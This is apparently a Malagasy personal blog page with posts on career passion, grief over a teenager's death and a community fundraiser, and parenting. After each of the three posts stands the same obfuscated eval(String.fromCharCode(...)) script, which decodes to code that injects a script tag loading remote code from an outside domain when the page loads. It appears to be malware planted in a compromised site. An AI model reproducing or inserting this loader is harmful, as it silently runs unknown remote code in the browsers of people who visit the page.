 2. Faha roa indray dia tiavo ary aza atao ambanin-javatra ny fitiavana io asanao io fa io no fidiram-bolanao, izany hoe mila ovanao ho fitaovana mihintsy io fitiavanao ny asa fivelomanao io mba tsy ho monamonaina ianao ary tsy halaina rehefa handeha hamonjy azy, ohatran’ny mpifamofo handeha hifamontoana, mangitakitaka ery ary maika ery ny hihaona, ary tokony ho tahaka izay ianao rehefa hiomana ka handeha hamonjy ny asanao. Raha tsy ao am-ponao mantsy ilay fitiavanao ny asanao dia ho diso tetika ianao satria dia ho fati-antoka be ho anao izany, diso planina ianao tsy misy fitiavana tsy misy fankasitrahana io asa io. Omeko ohatra kely ianao, izaho dia fony mbola kilasy faha 5 T5 raha tany Madagasikara  tao @ La Providence Amparibe dia efa fantatro fa hanao dokotera aho, nandeha ny fotoana dia teo à kilasse faha 8 na 4ème dia natahotra aho fa nahita olona nianjera ary tapaka ary hita tety ivelany ny taolany torak’ovitra aho ary teo dia nisinda ny nofinofiko sy ny tanjoko ho dokotera ary vetivety monja dia nahita tanjona ho tratrarina vaovao indray aho dia ny hoe hiasa amina hotely aho tsy mbola fantako na hoe ho mpahandro aho na ho mpandray olona t@ izany fa hoe hanana izay fanomezam-pahasoavana izay aho…. tojo ny tanjoko aho ankehitriny, tratrako izay, mila manatratra tanjona vaovao hafa indray aho izany fa tsy mbola lazaiko anareo aloha…..Ka izay no ataoko hoe io tanjona io dia mety tsy volena fa mety efa ao anatinao ao, ary raha efa ao anatinao ao izy io dia ho mora foana aminao ny hanatateraka izay. (Passion du métier–> bon plan de carrière –>bonheur –> réussite)
 3. Faha telo indray dia ny finiavana ary fahasahiana mandray fanapahan-kevitra henitra eo @ fiainana na aka’asa izany na eo @ fiainana manokana, Tsy mora ny mandray izay andraaikitra izay eo à fiainana nefa raha tianao ny handroso dia tsy misy afatsy ny tenanao ihany no afaka hanampy anao, tsy afaka ny hihaino ny hevitry ny hafa ianao satria tsy ireo no hiaina ny misy anao fa ianao ihany, azonao atao ny mangataka hevitraa fa anjaranao kosa ny mandanjalanja hoe aiza ny lalana mora sy ara-dalàna ahatratrarako ny tanjona tiako ho tratra.(prise de risque)
 4. Ny faha efatra farany dia ny fahaizana mandanjalanja ny toerana misy anao, sy ny ametrahanao anao sy ny manodidina anao, rehefa miasa mantsy isika dia tsy hoe ny asa ihany sisa no misy fa mba jerena ihany koa ny manodidina sao dia lasa andevozin’io asa io indray avy eo ka tsy hahay intsony hametraka ny tena sy ny manodidina @ toerana misy azy avy. Mahaiza misaotra ilay Mpahary fa izy no nanome anao, ny fianakavianao satria izy ireo no miahy anao, ary koa aza atao an-tsirambina ny vatanao fa io no tempolinao, omeo sakafo araa-pahasalamana izy ary taizao @ fanatanjahan-tena araka ny fahafahanao @ fandaharam-potoananao.(l’équilibre)

eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


32 comments

Fiaraha mientana

Tsy hita ny hambara……………….. izay no azo hanombohana ity lahatsoratra ity, satria tokoa dia zaza niaraka notaizaina t@ zanaky ny tena no namoy ny ainy ny faha 12 /01/2017 lasa teo tanora vao 15 taona monja. Tsy hay faritana mazava ny antony nandaozany ity fiainana an-tany mamintsika ity, fa ny hany haiko dia kepoka aho, gina tsy nahateny raha vao nolazain’ilay ankizy tato an-trano ny vaovao ratsy.

Ny tadidiko hany naverimberiko tao @ efitra fandroana satria tao ao no naheno ny vaovao ratsy dia ny hoe mba miangatra izao Any Ambony any izao, fa dia nahoana loatra re? nipararetra, nangozohozo ny lohaliko, tsy tsaroako mbamin’ny tokony hataoko akory aza, nivoaka avy tao aho dia nandefa SMS tany @ i Max sy Lydia fa tsy ho sahiko akory na ny haheno ny feon’izy mivady aza. Atao ahoana ny ho eo @ toeran ny olona namoy ain-janaka izany? ‘saika’ efa teo ihany koa aho mantsy ka haiko tsara izany, Tompo ô!  Ianao mahay ny fiainanay, mpandahatra anay, nahoana tokoa reh e!.

Tsy hiditra @ antsipirihiny aho fa dia aleo hijanona ho ahy samy irery izany, fa ny fiaraha mientan’ny mpiara belona kosa dia tsy azoko odiana tsy hita, na teo @ mpiara miangona izany, iny moa dia efa mahazatra anay satria dia tanana havia sy havanana izahay ao am-piangonana na ao @ fiangonana FPMA io na ao à fianfonana CCML, fa dia tsapa tokoa izany firaisan-kina izany, fa dia tonga @ ilay fitenenantsika hoe: ‘voin-kava mahatratra’. Tsy nijanona ho irery tokoa mantsy ny fianakaviana fa dia notronona hatramin’ny fampodiana ny razana hatrany an-tanàna.

Nanomana dia mangina ny fianakaviana ho fanomezam-boninahitra ho azy, ary dia tonga nanotrona izany daholo izay olona akaiky nahafantatra na tsia, azy.

Nisy ihany koa ny fiaraha mientana ara-bola izay natao hampodiana ny razana satria na dia eo aza ny Mutuelle dia nangataka ry zareo mba ho aloha mialoha aloha ny vola vao hamerina ry zareo, nefa manoloana ny vola miavosa atrehana dia mbola nisy ihany koa ireo mahalala tanana eran-tany tonga nanotrona ity fianakaviana namoy ny menaky ny ainy, Tsy ho hay ny tsy hisaotra antsika rehetra ny amin’izany, onera be ny lany ary ho hataon ny fianakaviana ho tsara levenana ny maty Tompoko. Raha 9000€ no nangatahan’ny fianakaviana, dia nihoatra lavitra noho izany no tonga tao amin’ilay fiaraha-mientan’ny mpiara-belona, Ny Tompo, anie hitahy anareo.

Ry zareo moa izany avy any Ambatondrazaka, tany nihavian’ilay nenitoako lasana t@ herintaona ihany koa, i Max dia isan’ny nivezivezy tsy sasatra tany @ hopitaly fony ilay nenitoako tany, ary nony lasana izy dia mbola izy ihany koa no niaraka tamiko nikarakara ny fotoam-pivavahana tao am-piangonana ho fanaovam-beloma farany azy.

Maharary ary fery tsy hikatona intsony ny nilaozan-janaka, ny fotoana anie hanamaivana ny fahabangana raha efa nihatra taminao mpamaky izany.

 

Teny kely natolotro ho faampaherezanaa notsongaiko tao amin’ny baiboly:

 • Salamo 73 , 23 :
  Nefa izaho dia eo aminao ihany mandrakariva, mihazona ny tanako ankavanana Hianao.
  Salamo 73 , 26 :
  Na dia levona aza ny nofoko sy ny foko, dia mbola vatolampin’ny foko sy anjarako mandrakizay Andriamanitra.
 • Joba 23 , 14a :   Eny, manatanteraka izay voatendry ho ahy Izy

 

 

 

 eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


58 comments

FItaizana

Ela aho izany tsy teto,

 

Resaka rediredy @ fitaizana indray ity, mahay mitaiza ve aho?

Handray 18 taona atsy ho atsy ny zanako…..efa lehibe aho hoy izy izany foana no ambetin-teniny, inona moa no mahalaza fe lehibe ny olona iray? izaho anefa toa tsy mahatsiaro tena akory fa efa lehibe izany na dia efa mananika ny 50 taona aza, ny taona ve no hamaritana ny maha lehibe ny olona sa ny toe-tsaina sa ny toe-batany?

Fony mbola velona i neninay dia tsy nisy zavatra niafina taminy ny mahazo ahy na tsara io na ratsy,  na an-kafaliana na fahoriana, indrindra moa fa fahorian-tsaina izany, fa ny ankizy ankehitriny kosa dia mahazendana ahy fa dia izao namany izao lava hono no hifampizarany ny manjo azy, ary ny zanako manokana indray ankoatran’ny namany dia mba misy ihany koa fotoana moa natokanay hiresahana @ manaampahaizana dokotera mba hitantarany ny fiainany manokana, ka manampy azy io @ lafiny ara-batana aloha ary ara-tsaina ihany koa. Ka raha misy resaka tsy tiany ho resahana amiko dia mba milamindamin-dratsy aho fa tsy hanoro vohona azy io manam-pahaizanaa io fa anisan’ny mpanabe ihany koa ary mpitaiza, izay no asany tsinona. Tsy ahitana izany moa any @ firenentsika fa aty @ misy anay no tena ahaitana izany ka dia manararaotra mihintsy izahay mianaka noho izany, sady hitanay ihany koa fa manampy anay ilay firesahana aminy.

Tsy misakana ny fananany ny tsiambaraa-telokeliny anefa izany raha aminay mianaka maanokana, fa hafa ihany ny sain-dreny tia hahafantatra ny zava-drehetra miseho @ fiainan-janany, izay aloha ny aahy fa ny anareo no tsy haiko, sa ve izaho no zatra nahatrizao aza mitantara ny rehetra miseho @ fiainako @ i neninay???

Hatreo indray aloha ny @ iny fa tsy ho voavahako ity olana ity……eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


24 comments